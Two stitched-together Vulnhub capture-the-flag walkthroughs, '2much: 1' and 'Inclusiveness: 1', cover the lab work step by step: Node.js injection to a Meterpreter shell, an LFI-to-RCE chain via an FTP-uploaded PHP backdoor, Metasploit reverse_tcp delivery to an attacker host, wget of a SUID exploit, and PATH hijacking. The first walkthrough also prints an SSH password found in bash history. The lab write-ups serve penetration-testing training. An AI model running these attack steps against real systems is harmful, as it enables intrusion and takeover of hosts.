2much: 1: Vulnhub Walkthrough

In this article, we are going to crack the 2much: 1 Capture the Flag Challenge and present a detailed walkthrough. The machine depicted in this Walkthrough is hosted on Vulnhub. Credit for making this machine goes to 4ndr34z. Download this lab by clicking here.

Level: Intermediate

Penetration Testing Methodology

·         Network Scanning

o   Netdiscover scan

o   Nmap scan

·         Enumeration

o   Enumerating HTTP service on Browser

o   Node.js Vulnerable Detection

·         Exploitation

o   Installation NodeXP

o   Getting meterpreter using NodeXP

·         Post Exploitation

o   Enumerating for User Flag

o   Reading the User Flag

·         Privilege Escalation

o   Enumerating Bash History

o   Scripting for SUID

o   Exploiting SUID

o   Getting Root Access

·         Reading Root Flag

Walkthrough

Network Scanning

We downloaded, imported and ran the virtual machine (.ova) on the VMWare Workstation, the machine will automatically be assigned an IP address from the network DHCP. To begin we will find the IP Address of our Target Machine, for that we will use the following command as it helps to see all the IP’s in an internal network.

netdiscover

We found the target’s IP Address 192.168.0.109. The next step is to scan the target machine by using Nmap tool. This is to find the open ports and services on the target machine and will help us to proceed further

nmap -sV -p- 192.168.0.109

 

Enumeration

There were quite some services running on the system. But seeing port 80, we wanted to take a look at the webpage that is being hosted on it. We found the target machine riddled with all the Vulnerable Applications like DVWA, XVWA, etc. We tried to get to the system through those but was unsuccessful.

http://192.168.0.109

After going through the http services that we found in the nmap, we were running and checking each one of them one by one. Till we reached to a Nodejs Service on port 8081. Upon browsing the port, we saw that it gives back the message “Hello undefined”. This got us thinking that there must be a parameter here that will be defining the name which in our case was undefined.

http://192.168.0.109:8081

Exploitation

We explored if we can tamper with this parameter manually. But it takes a lot of time. So, we found this this brilliant tool that will do the heavy lifting for us. As it is hosted on GitHub, we used the git clone command to clone the repository. After cloning, we get into the cloned directory to find the python script and other required files.

git clone https://github.com/esmog/nodexp.git

cd nodexp/

ls

We read the README that contained the syntax in which we need to provide the URL of the target.  We run the script as shown in the give image.

python nodexp.py –url=”http://192.168.0.109:8081/?name=[INJECT_HERE]”

The application runs and passes a number of parameters to determine if the Nodejs is vulnerable. After running for a while, it confirms that our target is indeed injectable. It asks if we want to generate a meterpreter shell. We enter ‘y’ for confirmation. After that it asks us for our Local IP Address and port. We provide the IP Address and port of our Attacker Machine. After providing the details it loads the Metasploit Framework

After we give our confirmation for the generation of shell, the tool opens up a prompt which starts configurating the Metasploit Framework to attack on the target machine.  

Now we see that Metasploit gets loaded and the payload is being uploaded. As soon as the upload of the payload completes 3 sessions are generated.

We can check this using the sessions command in Metasploit Framework. As shown in the image given below we have 3 sessions from the target machine.

Post Exploitation

We interact with the third session using the -i parameter of the sessions command. The shell we got was an improper shell. We need to convert it into a TTY Shell. This can be achieved using the python one liner. After gaining the TTY shell, we check the user with the id command. On further enumeration, we found a user.txt. We believe this is out first flag!!

session -i 3

python -c ‘import pty; pty.spawn(“/bin.bash”)’

id

cat user.txt

Privilege Escalation

As a part of our Post Exploitation exercises, we browsed the .bash_history files. In this file, we found a set of SSH credentials as shown in the image given below.

We try to login via SSH as root user using the aforementioned credentials. This gave us a root shell. But something tells us that the game isn’t over yet. We ran the ip addr command to get the information about the network configurations of this machine. We found an internal IP Address: 172.17.0.4/16. This IP Address tells us that we are in a docker.

ssh root@127.0.0.1 -p23

3236$fsdfzcv_cs

ip addr

Moving on, we scanned the directory for files and found a file named tdl.txt. Upon opening it we see that it tells us that we have port 21 and Anonymous Access is allowed. We log out the SSH session and try to look for the same tdl.txt file in the host machine. Upon proper enumeration we saw that the same tdl.txt file was available in /home/4ndr34z/ftp/. This means this directory is shared with the docker.

ls

cat tdl.txt

logout

ls -a

cd ftp

ls

cat tdl.txt

This means that we can escalate privilege using the SSH connection. We could login as root on the docker and leave a file to invoke access there. Then log out from docker and come back to the target system and execute it. We are going to use the following script for escalating privilege.

As the script in C, we complied the script using gcc as shown in the image given below. After compiling, we share the file via HTTP server that is generated using a python one-liner.

gcc exploit.c -o exploit

Now we login as root in the docker as we did earlier. Then we will download exploit binary that we hosted using wget command as shown in the image given below. As it is a SUID, we need to give it proper permissions. We do this using the chmod command.

ssh root@127.0.0.1 -p 23

wget http://192.168.0.106:8000/exploit

chmod 4755 exploit

Now, we log out from the docker and traverse to the location of the file and executed the binary. Upon completion we see that we have the root privileges on this target machine. All that’s left is to read the root flag.

logout

ls

./exploit

ls -a

cd /root

cat root.txt

Inclusiveness: 1: Vulnhub Walkthrough

Another walkthrough for the vulnhub machine “INCLUSIVENESS: 1” which is an Intemediate level lab designed by the author “h4sh5 & Richard Lee” to give a taste to the OSCP Labs. The challenge is same just like any other CTF challenge where you identify the flag with the help of your pentest skill.

Download it from here: https://www.vulnhub.com/entry/inclusiveness-1,422/

Penetration Testing Methodologies

Network Scanning

·         Netdiscover

·         nmap

Enumeration

·         Robots.txt

·         User agent restriction bypass

·         LFI

Exploiting LFI

·         LFI To RCE

Privilege Escalation

·         Abusing PATH Variable

Walkthrough

Network Scanning

So, as we always start with netdiscover to get the IP of the VM machine and the IP of the host I’ve found is 192.168.29.151.

Let’s proceed with network scan using Nmap aggressive scan as given below.

nmap -p- -A 192168.29.151

And as a result, we find that port 21 is open for FTP where anonymous login has been allowed and the directory name as /pub is writeable, and port 80 and 22 are also accessible for HTTP and SSH respectively.

Enumeration

To find any loopholes we need to list more, so we're browsing the host IP in the web browser, but unfortunately, they were found only the "Apache2 Debian Default page."

Instead we try to check for the robots.txt file and, as a result, the message "You are not a search engine!" is shown. You can't read my robots.txt!

Without wasting time, I try to bypass this restriction by editing a new useragent in my firefox using the following steps:

·         Inside the url tab search for “about:config”

·         Then search for preference Name: useragnet

·         Make a right click then > New > String

You get a dialog box; enter the preference name “general.useragent.overriide” as shown in the below image.

Enter the string value to provide useragent “GoogleBot”.

Once the above steps have been completed, the record will be shown for your new edit preference.

Now reload the URL for /robots.txt page and you will be able to read the disallowed entry as “/secret_informtion/” as shown below.

So, we've explored /secret_information, it brings a web page that describes "DNS Zone Transfer Attack" and the web page contains two hyperlinks "English & Spanish."

As I click on the "English" hyperlink, I found that it was calling the en.php via lang parameter in the URL, which means that there could be possibilities for LFI.

Therefore, I try to get /etc/passwd file by abusing the php include of the webpage and as result I got the whole contents of the /etc/passwd file as shown in the below image.

Exploiting LFI

So, it was time to exploit the vulnerability of the LFI by injecting a malicious file and, as you know, the FTP service is available as anonymous and / pub is a writable directory.

We then try to read the "vsftpd.conf" FTP config file by abusing LFI to enumerate the writeable directory path.

We've prepared a php file that contains a malicious code that will further trigger remote command execution vulnerabilities.

Now it’s time to upload the malicious file “backdoor.php” on the host machine via ftp, thus follow the below commands

ftp 192.168.29.151

cd /pub

put backdoor.php

Further, we need to run the uploaded file to execute the malicious code by executing following:

http://192.168.29.151/secret_information/?/lang=var/ftp/pub/backdoor.php&cmd=id

Using the URL above, try to run the backdoor.php file and simultaneously run the OS command "Id" as shown in the image provided here.

As we have been successful in inducing RCE in the installed application by abusing LFI, we are continuing with Metasploit's "web delivery" Module to compromise the host machine in order to obtain a reverse connection.

use/exploit/multi/script/web_delivery

set target 1

set lhost 192.168.29.208

set payload php/meterpreter/reverse_tcp

exploit

This will generate a malicious PHP code which you’ll use for execution on the web URL as done above.

So, I copied the above malicious code and paste it inside the URL to get the back connection of the host through the URL execution.

Privilege Escalation

Booom!!! We hit the goal and obtain the meterperter session the host machine, since it was boot to root CTF, we need to escalate the root privilege shell, therefore we try to identify all programs or files that have SUID bits enabled.

So, with the help of find command, we've got a list of programs running as a super user that unlocks the SUID bit where I notice /home/tom/rootshell.

Inside /root/tom/ I found rootshell.c file and a compile file rootshell that owns SUID permissions.

According this piece of code if the file is executed as Tom user by calling the function for “whoami” program for validation then you will get a privilege shell else it will print user-ID that is currently logged in will be displayed.

In simple words the rootshell program give a high privilege shell if the output of whoami program will be “tom”.

You can easily take advantage of this configuration by abusing the PATH system. Here, we built a file as "whoami" in the / tmp directory, and write the following bash code to print "tom"

cd /tmp

echo “printf “tom”” > whoami

chmod 777 whoami

Add a temporary path variable with the help of following command. you will observe that we had added /tmp as PATH variable.

export PATH=/tmp:$PATH

echo path

when all is done then the rootshell to get the root privilege shell just we have obtained here as show below.

cd /home/tom

./rootshell

cd /root

cat flag.txt

Finally, we have found the root shell a flag.txt file, this lab has good combination of basic vulnerability of Web and OS privilege Escalation.